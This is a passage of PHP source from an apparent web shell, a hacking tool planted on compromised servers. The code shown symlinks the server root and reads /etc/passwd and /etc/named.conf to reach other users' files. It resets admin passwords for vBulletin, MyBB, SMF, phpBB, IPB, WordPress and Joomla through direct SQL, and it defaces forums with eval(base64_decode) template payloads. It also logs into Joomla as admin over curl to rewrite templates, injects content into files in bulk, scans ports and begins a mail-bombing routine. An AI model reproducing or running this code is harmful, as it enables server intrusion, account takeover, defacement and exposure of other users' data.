1476 if(!file_exists($fakedir))
1477 mkdir($fakedir);
1478 chdir($fakedir);
1479 }
1480
1481 while(1<$as--) chdir("..");
1482
1483 $hardstyle = explode("/", $file);
1484
1485 for($a=0;$a<count($hardstyle);$a++)
1486 {
1487 if(!empty($hardstyle[$a]))
1488 {
1489 if(!file_exists($hardstyle[$a]))
1490 mkdir($hardstyle[$a]);
1491 chdir($hardstyle[$a]);
1492 $as++;
1493 }
1494 }
1495 $as++;
1496 while($as--)
1497 chdir("..");
1498
1499 @rmdir("fakesymlink");
1500 @unlink("fakesymlink");
1501
1502 @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
1503
1504 while(1)
1505 if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
1506 else $num++;
1507
1508 @unlink("fakesymlink");
1509 mkdir("fakesymlink");
1510
1511 echo '<CENTER>check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</CENTER>';
1512 }
1513 else
1514 echo '<CENTER>Cannot Create Symlink</CENTER>';
1515}
1516else if(isset($_REQUEST['404new']))
1517{
1518 ?>
1519 <form>
1520 <center><textarea name=message cols=100 rows=18 class=box>lol! You just got hacked</textarea></br>
1521 <input type="button" onClick="my404page(message.value)" value=" Save " class=but></center>
1522 </br>
1523 </form>
1524 <?php
1525}
1526else if(isset($_REQUEST['404page']))
1527{
1528 $url = $_SERVER['REQUEST_URI'];
1529 $path=explode('/',$url);
1530 $url =str_replace($path[count($path)-1],'',$url);
1531 if(isset($_POST['message']))
1532 {
1533 if($myfile = fopen(".htaccess", "a"))
1534 {
1535 fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r");
1536 if($myfilee = fopen("404.html", "w+"))
1537 {
1538 fwrite($myfilee, $_POST['message']);
1539 }
1540 echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
1541 }
1542 else
1543 echo "<center>Cannot Set 404 Page</center>";
1544 }
1545 else if(strlen($ind) != 0)
1546 {
1547 if($myfile = fopen(".htaccess", "a"))
1548 {
1549 fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r");
1550
1551 if($myfilee = fopen("404.html", "w+"))
1552 {
1553 fwrite($myfilee, base64_decode($ind));
1554
1555 fclose($myfilee);
1556 echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
1557 }
1558 fclose($myfile);
1559 }
1560 else
1561 {
1562 echo "<center>Cannot Set 404 Page</center>";
1563 }
1564 }
1565 else
1566 echo "<center>Nothing Specified in the shell</center>";
1567}
1568else if(isset($_GET["domains"]))
1569{
1570 ?><center><iframe src="<?php echo 'http://sameip.org/ip/' . getenv('SERVER_ADDR'); ?>" width="80%" height="1000px"></iframe></center><?php
1571}
1572else if(isset($_GET["symlink"]))
1573{
1574 $d0mains = @file("/etc/named.conf");
1575 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
1576 $path=explode('/',$url);
1577 $url =str_replace($path[count($path)-1],'',$url);
1578 if($d0mains)
1579 {
1580 @mkdir("dhanush",0777);
1581 @chdir("dhanush");
1582 execmd("ln -s / root");
1583 $file3 = 'Options all
1584 DirectoryIndex Sux.html
1585 AddType text/plain .php
1586 AddHandler server-parsed .php
1587 AddType text/plain .html
1588 AddHandler txt .html
1589 Require None
1590 Satisfy Any
1591 ';
1592 $fp3 = fopen('.htaccess','w');
1593 $fw3 = fwrite($fp3,$file3);
1594 @fclose($fp3);
1595 echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr align =center><td align=center><font size=3 >S. No.</font></td><td align=center><font size=3 >Domains</font></td><td align=center><font size=3 >Users</font></td><td align=center><font size=3 >Symlink</font></td><td align=center><font size=3 >Information</font></td></tr>";
1596
1597 $dcount = 1;
1598 foreach($d0mains as $d0main)
1599 {
1600 if(eregi("zone",$d0main))
1601 {
1602 preg_match_all('#zone "(.*)"#', $d0main, $domains);
1603 flush();
1604
1605 if(strlen(trim($domains[1][0])) > 2)
1606 {
1607 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1608
1609 echo "<tr align=center><td><font class=txt>" . $dcount . "</font></td><td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td><td><font class=txt>".$user['name']."</font></td><td><a href=".$url."dhanush/root/home/".$user['name']."/public_html target='_blank'><font class=txt>Symlink</font></a></td><td><font class=txt><a href=?info=".$domains[1][0]." target=_blank>info</a></font></td></tr>"; flush();
1610 $dcount++;
1611 }
1612 }
1613
1614 }
1615 echo "</table>";
1616 }
1617 else
1618 {
1619 if(stristr(php_uname(),"Linux"))
1620 {
1621 ?>
1622 <div style="float:left;position:fixed;">
1623 <form>
1624 <table cellpadding="9">
1625 <tr>
1626 <th colspan="2">Get User Name</th>
1627 </tr>
1628 <tr>
1629 <td>Enter Website Name :</td>
1630 <td><input type="text" name="sitename" value="sitename.com" class="sbox"></td>
1631 </tr>
1632 <tr>
1633 <td align="center" colspan="2"><input type="button" onClick="getname(sitename.value)" value=" Get IT " class="but"></td>
1634 </tr>
1635 <tr>
1636 <td colspan=2 align=center><div style="width:250px;" id="showsite"></div></td>
1637 </tr>
1638 </table>
1639 </form>
1640 </div>
1641 <?php
1642 $TEST=@file('/etc/passwd');
1643 if ($TEST)
1644 {
1645 @mkdir("dhanush",0777);
1646 @chdir("dhanush");
1647 execmd("ln -s / root");
1648 $file3 = 'Options all
1649 DirectoryIndex Sux.html
1650 AddType text/plain .php
1651 AddHandler server-parsed .php
1652 AddType text/plain .html
1653 AddHandler txt .html
1654 Require None
1655 Satisfy Any
1656 ';
1657 $fp3 = fopen('.htaccess','w');
1658 $fw3 = fwrite($fp3,$file3);
1659 @fclose($fp3);
1660
1661 echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Users</font></td><td align=center><font size=3 >Symlink</font></td></tr>";
1662
1663 $dcount = 1;
1664 $file = fopen("/etc/passwd", "r");
1665 //Output a line of the file until the end is reached
1666 while(!feof($file))
1667 {
1668 $s = fgets($file);
1669 $matches = array();
1670 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1671 $matches = str_replace("home/","",$matches[1]);
1672 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1673 continue;
1674 echo "<tr><td align=center><font size=3 class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $matches . "</td>";
1675 echo "<td align=center><font size=3 class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
1676 $dcount++;
1677 }
1678 fclose($file);
1679
1680 echo "</table>";
1681 }
1682 else
1683 {
1684 @mkdir("dhanush",0777);
1685 @chdir("dhanush");
1686 execmd("ln -s / root");
1687 $file3 = 'Options all
1688 DirectoryIndex Sux.html
1689 AddType text/plain .php
1690 AddHandler server-parsed .php
1691 AddType text/plain .html
1692 AddHandler txt .html
1693 Require None
1694 Satisfy Any
1695 ';
1696 $fp3 = fopen('.htaccess','w');
1697 $fw3 = fwrite($fp3,$file3);
1698 @fclose($fp3);
1699
1700 echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Users</font></td><td align=center><font size=3 >Symlink</font></td></tr>";
1701
1702 $temp = "";
1703 $val1 = 0;
1704 $val2 = 1000;
1705 for(;$val1 <= $val2;$val1++)
1706 {
1707 $uid = @posix_getpwuid($val1);
1708 if ($uid)
1709 $temp .= join(':',$uid)."\n";
1710 }
1711 echo '<br/>';
1712 $temp = trim($temp);
1713
1714 $file5 = fopen("test.txt","w");
1715 fputs($file5,$temp);
1716 fclose($file5);
1717
1718 $dcount = 1;
1719 $file = fopen("test.txt", "r");
1720 while(!feof($file))
1721 {
1722 $s = fgets($file);
1723 $matches = array();
1724 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1725 $matches = str_replace("home/","",$matches[1]);
1726 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1727 continue;
1728 echo "<tr><td align=center><font size=3 class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $matches . "</td>";
1729 echo "<td align=center><font size=3 class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
1730 $dcount++;
1731 }
1732 fclose($file);
1733 echo "</table>";
1734 unlink("test.txt");
1735 }
1736 }
1737 else
1738 echo "<center><font size=4 >Cannot create Symlink</font></center>";
1739 }
1740}
1741else if(isset($_GET['host']) && isset($_GET['protocol']))
1742{
1743 echo "Open Ports: ";
1744 $host = $_GET['host'];
1745 $proto = $_GET['protocol'];
1746 $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
1747 for($current = 0; $current <= 23; $current++)
1748 {
1749 $currents = $myports[$current];
1750 $service = getservbyport($currents, $proto);
1751 // Try to connect to port
1752 $result = fsockopen($host, $currents, $errno, $errstr, 1);
1753 // Show results
1754 if($result)
1755 echo "<font class=txt>$currents, </font>";
1756 }
1757}
1758else if(isset($_REQUEST['forumpass']))
1759{
1760 $localhost = $_GET['f1'];
1761 $database = $_GET['f2'];
1762 $username = $_GET['f3'];
1763 $password = $_GET['f4'];
1764 $prefix = $_GET['prefix'];
1765 $newpass = $_GET['newpass'];
1766 $uid = $_GET['uid'];
1767
1768 if($_GET['forums'] == "vb")
1769 {
1770 $newpass = $_GET['newipbpass'];
1771 $uid = $_GET['ipbuid'];
1772 $con = mysql_connect($localhost,$username,$password);
1773 $db = mysql_select_db($database,$con);
1774 $salt = "eghjghrtd";
1775 $newpassword = md5(md5($newpass) . $salt);
1776 if($prefix == "" || $prefix == null)
1777 $sql = mysql_query("update user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
1778 else
1779 $sql = mysql_query("update ".$prefix."user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
1780 if($sql)
1781 {
1782 mysql_close($con);
1783 echo "<font class=txt>Password Changed Successfully</font>";
1784 }
1785 else
1786 echo "Cannot Change Password";
1787 }
1788 else if($_GET['forums'] == "mybb")
1789 {
1790 $newpass = $_GET['newipbpass'];
1791 $uid = $_GET['ipbuid'];
1792 $con = mysql_connect($localhost,$username,$password);
1793 $db = mysql_select_db($database,$con);
1794 $salt = "jeghj";
1795 $newpassword = md5(md5($salt).md5($newpass));
1796 if($prefix == "" || $prefix == null)
1797 $sql = mysql_query("update mybb_users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
1798 else
1799 $sql = mysql_query("update ".$prefix."users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
1800 if($sql)
1801 {
1802 mysql_close($con);
1803 echo "<font class=txt>Password Changed Successfully</font>";
1804 }
1805 else
1806 echo "Cannot Change Password";
1807 }
1808 else if($_GET['forums'] == "smf")
1809 {
1810 $newpass = $_GET['newipbpass'];
1811 $uid = $_GET['ipbuid'];
1812 $con = mysql_connect($localhost,$username,$password);
1813 $db = mysql_select_db($database,$con);
1814
1815 if($prefix == "" || $prefix == null)
1816 {
1817 $result = mysql_query("select member_name from smf_members where id_member = $uid");
1818 $row = mysql_fetch_array($result);
1819 $membername = $row['member_name'];
1820 $newpassword = sha1(strtolower($membername).$newpass);
1821 $sql = mysql_query("update smf_members set passwd = '$newpassword' where id_member = '$uid'");
1822 }
1823 else
1824
1825 {
1826 $result = mysql_query("select member_name from ".$prefix."members where id_member = $uid");
1827 $row = mysql_fetch_array($result);
1828 $membername = $row['member_name'];
1829 $newpassword = sha1(strtolower($membername).$newpass);
1830 $sql = mysql_query("update ".$prefix."members set passwd = '$newpassword' where id_member = '$uid'");
1831 }
1832 if($sql)
1833 {
1834 mysql_close($con);
1835 echo "<font class=txt>Password Changed Successfully</font>";
1836 }
1837 else
1838 echo "Cannot Change Password";
1839 }
1840 else if($_GET['forums'] == "phpbb")
1841 {
1842 $newpass = $_POST['newipbpass'];
1843 $uid = $_POST['ipbuid'];
1844 $con = mysql_connect($localhost,$username,$password);
1845 $db = mysql_select_db($database,$con);
1846
1847 $newpassword = md5($newpass);
1848 if(empty($prefix) || $prefix == null)
1849 $sql = mysql_query("update phpb_users set user_password = '$newpassword' where user_id = '$uid'");
1850 else
1851 $sql = mysql_query("update ".$prefix."users set user_password = '$newpassword' where user_id = '$uid'");
1852 if($sql)
1853 {
1854 mysql_close($con);
1855 echo "<font class=txt>Password Changed Successfully</font>";
1856 }
1857 else
1858 echo "Cannot Change Password";
1859 }
1860 else if($_GET['forums'] == "ipb")
1861 {
1862 $newpass = $_POST['newipbpass'];
1863 $uid = $_POST['ipbuid'];
1864 $con = mysql_connect($localhost,$username,$password);
1865 $db = mysql_select_db($database,$con);
1866 $salt = "eghj";
1867 $newpassword = md5(md5($salt).md5($newpass));
1868 if($prefix == "" || $prefix == null)
1869 $sql = mysql_query("update members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
1870 else
1871 $sql = mysql_query("update ".$prefix."members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
1872 if($sql)
1873 {
1874 mysql_close($con);
1875 echo "<font class=txt>Password Changed Successfully</font>";
1876 }
1877 else
1878 echo "Cannot Change Password";
1879 }
1880 else if($_GET['forums'] == "wp")
1881 {
1882 $uname = $_GET['uname'];
1883 $con = mysql_connect($localhost,$username,$password);
1884 $db = mysql_select_db($database,$con);
1885
1886 $newpassword = md5($newpass);
1887 if($prefix == "" || $prefix == null)
1888 $sql = mysql_query("update wp_users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'");
1889 else
1890 $sql = mysql_query("update ".$prefix."users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'");
1891 if($sql)
1892 {
1893 mysql_close($con);
1894 echo "<font class=txt>Password Changed Successfully</font>";
1895 }
1896 else
1897 echo "Cannot Change Password";
1898 }
1899 else if($_GET['forums'] == "joomla")
1900 {
1901 $newjoomlapass = $_GET['newjoomlapass'];
1902 $joomlauname = $_GET['username'];
1903 $con = mysql_connect($localhost,$username,$password);
1904 $db = mysql_select_db($database,$con);
1905
1906 $newpassword = md5($newjoomlapass);
1907 if($prefix == "" || $prefix == null)
1908 $sql = mysql_query("update jos_users set password = '$newpassword', username = '$joomlauname' where name = 'Super User'");
1909 else
1910 $sql = mysql_query("update ".$prefix."users set password = '$newpassword', username = '$joomlauname' where name = 'Super User' OR name = 'Administrator'");
1911 if($sql)
1912 {
1913 mysql_close($con);
1914 echo "<font class=txt>Password Changed Successfully</font>";
1915 }
1916 else
1917 echo "Cannot Change Password";
1918 }
1919}
1920else if(isset($_POST['forumdeface']))
1921{
1922 $localhost = $_POST['f1'];
1923 $database = $_POST['f2'];
1924 $username = $_POST['f3'];
1925 $password = $_POST['f4'];
1926 $index = $_POST['index'];
1927 $prefix = $_POST['tableprefix'];
1928
1929 if($_POST['forumdeface'] == "vb")
1930 {
1931 $con =@ mysql_connect($localhost,$username,$password);
1932 $db =@ mysql_select_db($database,$con);
1933 $index=str_replace('"','\\"',$index);
1934 $attack = "{\${eval(base64_decode(\'";
1935 $attack .= base64_encode("echo \"$index\";");
1936 $attack .= "\'))}}{\${exit()}}</textarea>";
1937 if($prefix == "" || $prefix == null)
1938 $query = "UPDATE template SET template = '$attack'";
1939 else
1940 $query = "UPDATE ".$prefix."template SET template = '$attack'";
1941 $result =@ mysql_query($query,$con);
1942 if($result)
1943 echo "<center><font class=txt size=4><blink>Vbulletin Forum Defaced Successfully</blink></font></center>";
1944 else
1945 echo "<center><font size=4><blink>Cannot Deface Vbulletin Forum</blink></font></center>";
1946 }
1947 else if($_POST['forumdeface'] == "mybb")
1948 {
1949 $con =@ mysql_connect($localhost,$username,$password);
1950 $db =@ mysql_select_db($database,$con);
1951 $attack = "{\${eval(base64_decode(\'";
1952 $attack .= base64_encode("echo \"$index\";");
1953 $attack .= "\'))}}{\${exit()}}</textarea>";
1954 $attack = str_replace('"',"\\'",$attack);
1955
1956 if($prefix == "" || $prefix == null)
1957 $query = "UPDATE mybb_templates SET template = '$attack'";
1958 else
1959 $query = "UPDATE ".$prefix."templates SET template = '$attack'";
1960 $result =@ mysql_query($query,$con);
1961 if($result)
1962 echo "<center><font class=txt size=4><blink>Mybb Forum Defaced Successfully</blink></font></center>";
1963 else
1964 echo "<center><font size=4><blink>Cannot Deface Mybb Forum</blink></font></center>";
1965 }
1966 else if($_POST['forumdeface'] == "smf")
1967 {
1968 $head = $_POST['head'];
1969 $catid = $_POST['f5'];
1970
1971 $con =@ mysql_connect($localhost,$username,$password);
1972 $db =@ mysql_select_db($database,$con);
1973 if($prefix == "" || $prefix == null)
1974 $query = "UPDATE boards SET name='$head', description='$index' WHERE id_cat='$catid'";
1975 else
1976 $query = "UPDATE ".$prefix."boards SET name='$head', description='$index' WHERE id_cat='$catid'";
1977 $result =@ mysql_query($query,$con);
1978 if($result)
1979 echo "<center><font class=txt size=4><blink>SMF Forum Index Changed Successfully</blink></font></center>";
1980 else
1981 echo "<center><font size=4><blink>Cannot Deface SMF Forum</blink></font></center>";
1982 }
1983 else if($_POST['forumdeface'] == "ipb")
1984 {
1985 $head = $_POST['head'];
1986 $catid = $_POST['f5'];
1987
1988 $IPB = "forums";
1989 $con =@ mysql_connect($localhost,$username,$password);
1990 $db =@ mysql_select_db($database,$con);
1991 if($prefix == "" || $prefix == null)
1992 $result =@mysql_query($query = "UPDATE $IPB SET name = '$head', description = '$index' where id = '$catid'");
1993 else
1994 $result =@mysql_query($query = "UPDATE $prefix.$IPB SET name = '$head', description = '$index' where id = '$catid'");
1995 if($result)
1996 echo "<center><font class=txt size=4><blink>Forum Defaced Successfully</blink></font></center>";
1997 else
1998 echo "<center><font size=4><blink>Cannot Deface Forum</blink></font></center>";
1999 }
2000 else if($_POST['forumdeface'] == "wp")
2001 {
2002 $catid = $_POST['f5'];
2003 $head = $_POST['head'];
2004
2005 $con =@ mysql_connect($localhost,$username,$password);
2006 $db =@ mysql_select_db($database,$con);
2007 if($prefix == "" || $prefix == null)
2008 {
2009 if(isset($_POST["alll"]) && $_POST["alll"] == "All")
2010 $query = "UPDATE wp_posts SET post_title='$head', post_content='$index'";
2011 else
2012 $query = "UPDATE wp_posts SET post_title='$head', post_content='$index' WHERE ID='$catid'";
2013 }
2014 else
2015 {
2016 if(isset($_POST["alll"]) && $_POST["alll"] == "All")
2017 $query = "UPDATE ".$prefix."posts SET post_title='$head', post_content='$index'";
2018 else
2019 $query = "UPDATE ".$prefix."posts SET post_title='$head', post_content='$index' WHERE ID='$catid'";
2020
2021 }
2022 $result =@mysql_query($query,$con) or mysql_error();
2023 if($result)
2024 echo "<center><font class=txt size=4><blink>Wordpress Defaced Successfully</blink></font></center>";
2025 else
2026 echo "<center><font size=4><blink>Cannot Deface Wordpress</blink></font></center>";
2027 }
2028 else if($_POST['forumdeface'] == "joomla")
2029 {
2030 $site_url = $_POST['siteurl'];
2031 $dbprefix = $_POST['tableprefix'];
2032 $dbname = $_POST['f2'];
2033 $h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['index']))))."'))); exit; ?>";
2034
2035 function randomt()
2036 {
2037 $chars = "abcdefghijkmnopqrstuvwxyz023456789";
2038 srand((double)microtime()*1000000);
2039 $i = 0;
2040 $pass = '' ;
2041
2042 while ($i <= 7)
2043 {
2044 $num = rand() % 33;
2045 $tmp = substr($chars, $num, 1);
2046 $pass = $pass . $tmp;
2047 $i++;
2048 }
2049
2050 return $pass;
2051 }
2052 function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)
2053 {
2054 $ar0=explode($marqueurDebutLien, $text);
2055 $ar1=explode($marqueurFinLien, $ar0[$i]);
2056 $ar=trim($ar1[0]);
2057 return $ar;
2058 }
2059 $co=randomt();
2060
2061 $link=mysql_connect($localhost,$username,$password) ;
2062 mysql_select_db($dbname,$link);
2063
2064 $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
2065
2066 $req =mysql_query("SELECT * from `".$dbprefix."extensions` ");
2067
2068 if ( $req )
2069 {
2070 $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
2071 $data = mysql_fetch_array($req);
2072 $template_name=$data["template"];
2073
2074 $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'");
2075 $data = mysql_fetch_array($req);
2076 $template_id=$data["extension_id"];
2077
2078 $url2=$site_url."/index.php";
2079
2080 $ch = curl_init();
2081 curl_setopt($ch, CURLOPT_URL, $url2);
2082 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2083 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2084 curl_setopt($ch, CURLOPT_HEADER, 1);
2085 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2086 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2087 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2088
2089
2090 $buffer = curl_exec($ch);
2091
2092 $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
2093 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
2094
2095
2096 $url2=$site_url."/index.php";
2097 $ch = curl_init();
2098 curl_setopt($ch, CURLOPT_URL, $url2);
2099 curl_setopt($ch, CURLOPT_POST, 1);
2100 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");
2101 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2102 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2103 curl_setopt($ch, CURLOPT_HEADER, 0);
2104 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2105 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2106 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2107 $buffer = curl_exec($ch);
2108
2109 $pos = strpos($buffer,"com_config");
2110 if($pos === false)
2111 {
2112 echo("<br>[-] Login Error");
2113 exit;
2114 }
2115
2116 $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
2117 $ch = curl_init();
2118 curl_setopt($ch, CURLOPT_URL, $url2);
2119 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2120 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2121 curl_setopt($ch, CURLOPT_HEADER, 0);
2122 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2123 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2124
2125 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2126 $buffer = curl_exec($ch);
2127
2128 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
2129 if(!$hidden2)
2130 {
2131 echo("<br>[-] index.php Not found in Theme Editor");
2132 exit;
2133 }
2134
2135 $url2=$site_url."/index.php?option=com_templates&layout=edit";
2136
2137 $ch = curl_init();
2138 curl_setopt($ch, CURLOPT_URL, $url2);
2139 curl_setopt($ch, CURLOPT_POST, 1);
2140 curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
2141
2142 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2143 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2144 curl_setopt($ch, CURLOPT_HEADER, 0);
2145 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2146 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2147 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2148 $buffer = curl_exec($ch);
2149
2150 $pos = strpos($buffer,'<dd class="message message">');
2151 if($pos === false)
2152 {
2153 echo("<center><font size=4><blink>Cannot Deface Joomla</blink></font></center>");
2154 }
2155 else
2156 {
2157 echo("<center><font class=txt size=4><blink>Joomla Defaced Successfully</blink></font></center>");
2158 }
2159 }
2160 else
2161 {
2162 $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
2163 $data = mysql_fetch_array($req);
2164 $template_name=$data["template"];
2165
2166 $url2=$site_url."/index.php";
2167 $ch = curl_init();
2168 curl_setopt($ch, CURLOPT_URL, $url2);
2169 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2170 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2171 curl_setopt($ch, CURLOPT_HEADER, 1);
2172 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2173 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2174 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2175 $buffer = curl_exec($ch);
2176
2177 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
2178
2179 $url2=$site_url."/index.php";
2180 $ch = curl_init();
2181 curl_setopt($ch, CURLOPT_URL, $url2);
2182 curl_setopt($ch, CURLOPT_POST, 1);
2183 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");
2184 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2185 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2186 curl_setopt($ch, CURLOPT_HEADER, 0);
2187 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2188 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2189 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2190 $buffer = curl_exec($ch);
2191
2192 $pos = strpos($buffer,"com_config");
2193
2194 if($pos === false)
2195 {
2196 echo("<br>[-] Login Error");
2197 exit;
2198 }
2199
2200 $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
2201 $ch = curl_init();
2202 curl_setopt($ch, CURLOPT_URL, $url2);
2203 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2204 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2205 curl_setopt($ch, CURLOPT_HEADER, 0);
2206 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2207 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2208 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2209 $buffer = curl_exec($ch);
2210
2211 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
2212
2213 if(!$hidden2)
2214 {
2215 echo("<br>[-] index.php Not found in Theme Editor");
2216 }
2217
2218 $url2=$site_url."/index.php?option=com_templates&layout=edit";
2219 $ch = curl_init();
2220 curl_setopt($ch, CURLOPT_URL, $url2);
2221 curl_setopt($ch, CURLOPT_POST, 1);
2222 curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
2223 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2224 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2225 curl_setopt($ch, CURLOPT_HEADER, 0);
2226 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2227 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2228 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2229 $buffer = curl_exec($ch);
2230
2231 $pos = strpos($buffer,'<dd class="message message fade">');
2232 if($pos === false)
2233 {
2234 echo("<center><font size=4><blink>Cannot Deface Joomla</blink></font></center>");
2235 exit;
2236 }
2237 else
2238 {
2239 echo("<center><font class=txt size=4><blink>Joomla Defaced Successfully</blink></font></center>");
2240 }
2241 }
2242 }
2243}
2244else if(isset($_POST['pathtomass']) && $_POST['pathtomass'] != '' && isset($_POST['filetype']) && $_POST['filetype'] != '' && isset($_POST['mode']) && $_POST['mode'] != '' && isset($_POST['injectthis']) && $_POST['injectthis'] != '')
2245{
2246 $filetype = $_POST['filetype'];
2247
2248 $mode = "a";
2249
2250 if($_POST['mode'] == 'Apender')
2251 $mode = "a";
2252
2253 if($_POST['mode'] == 'Overwriter')
2254 $mode = "w";
2255
2256 if (is_dir($_POST['pathtomass']))
2257 {
2258 $lolinject = $_POST['injectthis'];
2259 $mypath = $_POST['pathtomass'] .$directorysperator. "*.".$filetype;
2260 if(substr($_POST['pathtomass'], -1) == "\\")
2261 $mypath = $_POST['pathtomass'] . "*.".$filetype;
2262 foreach (glob($mypath) as $injectj00)
2263 {
2264 if($injectj00 == __FILE__)
2265 continue;
2266 $fp=fopen($injectj00,$mode);
2267 if (fputs($fp,$lolinject))
2268 echo '<br><font class=txt size=3>'.$injectj00.' was injected<br></font>';
2269 else
2270 echo 'failed to inject '.$injectj00.'<br>';
2271 }
2272 }
2273 else
2274 echo '<b>'.$_POST['pathtomass'].' is not available!</b>';
2275}
2276else if(isset($_POST['mailfunction']))
2277{
2278 if($_POST['mailfunction'] == "dobombing")
2279 {
2280 if(isset($_POST['to']) && isset($_POST['subject']) && isset($_POST['message']) && isset($_POST['times']) && $_POST['to'] != '' && $_POST['subject'] != '' && $_POST['message'] != '' && $_POST['times'] != '')
